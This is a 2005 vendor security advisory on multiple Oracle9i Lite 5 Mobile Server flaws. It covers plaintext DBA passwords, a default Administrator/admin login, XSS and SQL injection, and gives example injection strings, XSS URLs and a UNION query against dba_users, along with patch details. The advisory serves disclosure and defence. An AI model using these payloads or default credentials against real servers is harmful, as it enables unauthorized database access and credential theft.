|
Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company
|
Multiple security vulnerabilities in Oracle9i Lite 5
Details There are multiple vulnerabilities in Oracle9i Lite 5 Mobile Server. A valid account is not necessary to exploit one of the vulnerabilities. For all other vulnerabilities a valid login to Oracle9i Lite Mobile Server is necessary. An attacker can gain unauthorized access as DBA to the Oracle database server which contains the Oracle9i Lite schema. 1. Unencrypted password of DBA stored in repository.log 2. Unencrypted passwords in MOBILEADMIN.APPLICATIONS.DBPWD 3. Default (and unencrypted) password for Webtogo-Administrator 4. XSS in Oracle 9i Lite 5. XSS in Oracle 9i Lite 6. SQL-Injection in Oracle Lite 5i in siteside.jsp 7. SQL-Injection in Oracle Lite 5i in appside.jsp 8. SQL-Injection in Oracle Lite 5i in userside.jsp 9. SQL-Injection in Oracle Lite 5i in search 10.SQL-Injection via login-page 11.SQL-Injection in User Group Properties Workarounds There are no workarounds for these security vulnerabilities. Example 1. Default (and unencrypted) Password for Webtogo-Administrator Login to Webtogo http://server01/webtogo/index.html user: Administrator Password: admin ==> Account + unencrypted password is defined in the following file $OH/Mobile/Server/Repository/serveracl.ini ==> Encryption is disabled by default (ENCRYPTED=FALSE) 2. XSS in Oracle 9i Lite http://server01/webtogo/WLTop/edbkmk?itemid='<script>alert(document.cookie);</script> 3. XSS in Oracle 9i Lite http://server01/webtogo/admin/console/ccmenu?order=1'<script>alert(document.cookie);</script> 4. SQL-Injection in Oracle Lite 5i in siteside.jsp http://server01/webtogo/admin/console/siteside.jsp# ==> ' Result: ORA-01756: quoted string not properly terminated ==> ' or 1=1' Result: ORA-00933: SQL command not properly ended ==> '|| or 1=1' Result: ORA-00936: missing expression 5. SQL-Injection in Oracle Lite 5i in appside.jsp http://server01/admin/console/appside.jsp# ==> ' Result: ORA-01756: quoted string not properly terminated ==> ' or 1=1' Result: ORA-00933: SQL command not properly ended ==> '|| or 1=1' Result: ORA-00936: missing expression 6. SQL-Injection in Oracle Lite 5i in userside.jsp http://server01/webtogo/admin/console/userside# ==> ' Result: ORA-01756: quoted string not properly terminated ==> ' or 1=1' Result: ORA-00933: SQL command not properly ended ==> '|| or 1=1' Result: ORA-00936: missing expression 7. Injection in Oracle Lite 5i in search http://laptop01/webtogo/admin/console/search?criterea=username&query=&searchtype=2&sortcolumn=name'&sortdirection=asc ==> ORA-01756: quoted string not properly terminated 8. Inject SQL-Commands without a valid user account from the login-screen a. Go to the Login-Page http://server01/webtogo/index.html Username: %' or name like 'alex% Password: aaa b. Press Login c. Oracle Lite returns an error message but the following SQL-statements is executed “select id, user_role from users where name='%' OR NAME LIKE 'ALEX%'” 9. SQL-Injection in User Group Properties: http://server01/webtogo/admin/console/groupsinfo?groups ' UNION select 1,null from dba_users where password like '% ==> ORA-01789: query block has incorrect number of result columns Patch Information An advisory from Oracle is available on OTN: http://otn.oracle.com/deploy/security/pdf/2004alert63.pdf A patch for Oracle Lite 5.0.2 is available on Metalink: [metalink.oracle.com] History 21-oct-2003 Oracle secalert was informed about two security vulnerabilities 22-oct-2003 Seven additional vulnerabilities reported 23-oct-2003 Two additional vulnerabilities reported 23-oct-2003 Bug confirmed 18-feb-2004 Oracle published alert 63 25-apr-2005 Example and time to fix added © 2005 by Red-Database-Security GmbH - last update 03-nov-2005 |
Oracle Workflow |
